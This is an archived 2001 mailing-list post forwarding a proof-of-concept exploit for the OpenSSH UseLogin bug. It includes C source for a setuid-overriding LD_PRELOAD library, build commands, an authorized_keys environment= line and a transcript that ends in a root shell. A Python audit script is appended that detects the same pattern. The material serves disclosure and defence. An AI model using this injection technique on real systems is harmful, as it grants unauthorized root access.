Subject: Fwd: OpenSSH UseLogin proof of concept exploit
To: None <tech-security@netbsd.org>
From: Lubomir Sedlacik <salo@Xtrmntr.org>
List: tech-security
Date: 12/06/2001 02:49:49

hi,

confirmed on:

NetBSD 1.5X  - OpenSSH_2.9 NetBSD_Secure_Shell-20010624
NetBSD 1.5.2 - OpenSSH_2.5.1 NetBSD_Secure_Shell-20010614

everyone who uses "UseLogin yes" and has key authentication allowed for local
users, please at least set "UseLogin no" or comment it out.


----- Forwarded message from "[WaR]" <war@genhex.org> -----

Date: Thu, 6 Dec 2001 00:34:34 +0000
From: "[WaR]" <war@genhex.org>
To: vuln-dev@securityfocus.com
Subject: OpenSSH UseLogin proof of concept exploit

--[ OpenSSH UseLogin bug proof of concept exploit ]--
  by [WaR] <war@genhex.org> / http://www.genhex.org


--[ Intro ]--

 I was very curious to find out how to exploit this problem. Although
 I don't think anyone uses this feature, I looked into the matter anyway.
 Here it goes. It was tested on the following platforms:
  - Slackware 7.1 with OpenSSH3.0p1
  - RedHat 7.1 with OpenSSH_2.9p2
  - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
  - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
 The exploit should work as long as UseLogin does. YMMV.

 This is based on libroot from squidge@onyx.infonexus.com,
 published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
 you thought it wouldn't happen again...).

 Kudos to pmsac@toxyn.org for his help figuring out the problem with
 the Slackware UseLogin, testing on OpenBSD, and giving the idea for
 the seteuid(0) (it originally was a system("/bin/sh");).

--[ Code ]--

 Create a lib.c file with the next content:

 ---8<---
 #include <stdio.h>
 #include <unistd.h>   /* prototypes for setuid()/seteuid() and uid_t */

 /* Replaces libc's setuid() when the library is loaded via LD_PRELOAD:
    instead of dropping privileges it keeps the effective uid at 0. */
 int setuid(uid_t uid){
   printf("setuid() called...\n");
   seteuid(0);
   return 0;
 }
 ---8<---

 Compile it into a library:
 gcc -c -o lib.o lib.c
 ld -shared -o libroot.so lib.o
 chmod 755 ./libroot.so


 Now, for the tricky (*g*) part...

 You must have an account on the machine, and create an entry
 on $HOME/.ssh/authorized_keys (or authorized_keys2) with:

 environment="LD_PRELOAD=<your home>/libroot.so" <your public key>

 When sshd receives your connection, it will export this variable
 into the environment *BEFORE* running login. Somewhere after this,
 it executes a setuid. When it does, it makes a seteuid(0).

 $ id
 uid=1000(war) gid=100(users) groups=100(users)
 $ ssh war@localhost
 Enter passphrase for key '/home/war/.ssh/id_dsa':
 sh-2.04# id
 uid=0(root) gid=100(users) groups=100(users)


 It also works remotely. Anyway, you _MUST_ have an account on
 the victim machine so you can set up the environment, and log in.
 And obviously (duh) it must have UseLogin enabled.

 That's all.


 shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.



-- [WaR]
"if you can't hack it, hit it with a hammer"

----- End forwarded message -----

regards,

-- 
-- Lubomir Sedlacik <salo@Xtrmntr.org>   ASCII Ribbon campaign against  /"\ --
--                  <salo@silcnet.org>   e-mail in gratuitous HTML and  \ / --
--                                       Microsoft proprietary formats   X  --
-- PGPkey: http://Xtrmntr.org/salo.pgp                                  / \ --
-- Key Fingerprint: DBEC 8BEC 9A90 ECEC 0FEF  716E 59CE B70B 7E3B 70E2      --
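An audit check for the two preconditions the forwarded post describes: "UseLogin yes" in sshd_config, and an authorized_keys entry whose environment= option sets a dynamic-loader variable such as LD_PRELOAD. This is an added example, not code from the post, from OpenSSH, or from the list; it parses the authorized_keys option syntax documented in sshd(8) (comma-separated options, double-quoted values that may contain commas and spaces, backslash escapes inside quotes) and the plain "Keyword value" sshd_config syntax, and the sample authorized_keys and sshd_config inputs are constructed with placeholder key material. OpenSSH 3.0.2 and later ignore the environment option when UseLogin is on, and later versions gate it behind PermitUserEnvironment (default no), so on current servers this mostly confirms the absence of the pattern.

```python
import re

# A line with no options starts with a key type (or a bit count in the old
# RSA1 format); anything else in the first field is an options list.
KEY_TYPE_RE = re.compile(r"^(?:ssh-|ecdsa-|sk-)[\w@.-]+$|^\d+$")

# Dynamic-loader variables: an environment= option setting one of these lets
# the key holder inject code into whatever sshd runs next (the post's LD_PRELOAD).
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "DYLD_INSERT_LIBRARIES"}


def split_options(line):
    """Split the leading, comma-separated option list of an authorized_keys line.
    Double-quoted values may hold commas and spaces; backslash escapes the next
    character inside quotes. Returns (options, remainder_of_line)."""
    opts, cur, in_quote, i = [], [], False, 0
    while i < len(line):
        ch = line[i]
        if in_quote:
            if ch == "\\" and i + 1 < len(line):
                cur.append(line[i + 1])
                i += 2
                continue
            if ch == '"':
                in_quote = False
            else:
                cur.append(ch)
        elif ch == '"':
            in_quote = True
        elif ch == ",":
            opts.append("".join(cur))
            cur = []
        elif ch.isspace():
            break  # first unquoted whitespace ends the option list
        else:
            cur.append(ch)
        i += 1
    opts.append("".join(cur))
    return opts, line[i:].strip()


def audit_authorized_keys(text):
    """Return [(line_no, variable, assignment)] for every key whose environment=
    option sets a dynamic-loader variable."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if KEY_TYPE_RE.match(line.split(None, 1)[0]):
            continue  # plain key, no options field
        for opt in split_options(line)[0]:
            if opt.lower().startswith("environment="):
                assignment = opt[len("environment="):]
                var = assignment.split("=", 1)[0].strip()
                if var.upper() in LOADER_VARS:
                    findings.append((line_no, var, assignment))
    return findings


def uselogin_enabled(config_text):
    """True if sshd_config turns UseLogin on; sshd keeps the first value it sees
    for a keyword, so the first non-comment UseLogin line decides."""
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "uselogin":
            return parts[1].strip().lower() == "yes"
    return False  # sshd's default is UseLogin no


# Constructed sample inputs (placeholder key material, not real keys): a clean
# key, a key carrying the post's LD_PRELOAD pattern, and a harmless environment=.
SAMPLE_KEYS = """\
# constructed sample authorized_keys
ssh-dss AAAAB3NzaC1kc3MAAACBAPLACEHOLDER war@localhost
environment="LD_PRELOAD=/home/war/libroot.so" ssh-dss AAAAB3NzaC1kc3MAAACBAPLACEHOLDER war@localhost
command="/usr/bin/backup, please",no-pty,environment="EDITOR=vi" ssh-rsa AAAAB3NzaC1yc2EAAAAPLACEHOLDER backup
"""

SAMPLE_SSHD_CONFIG = """\
# constructed sshd_config excerpt; the next setting is the one the post warns about
Port 22
UseLogin yes
PermitRootLogin no
"""

if __name__ == "__main__":
    print("UseLogin enabled:", uselogin_enabled(SAMPLE_SSHD_CONFIG))
    for line_no, var, assignment in audit_authorized_keys(SAMPLE_KEYS):
        print(f"authorized_keys line {line_no}: environment= sets {var} ({assignment})")
```

To run it on a real host, read /etc/ssh/sshd_config into uselogin_enabled() and each user's ~/.ssh/authorized_keys (and authorized_keys2 on the versions named in the post) into audit_authorized_keys(); the post's attack needs both findings at once, but an LD_PRELOAD environment= entry is worth removing on its own.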
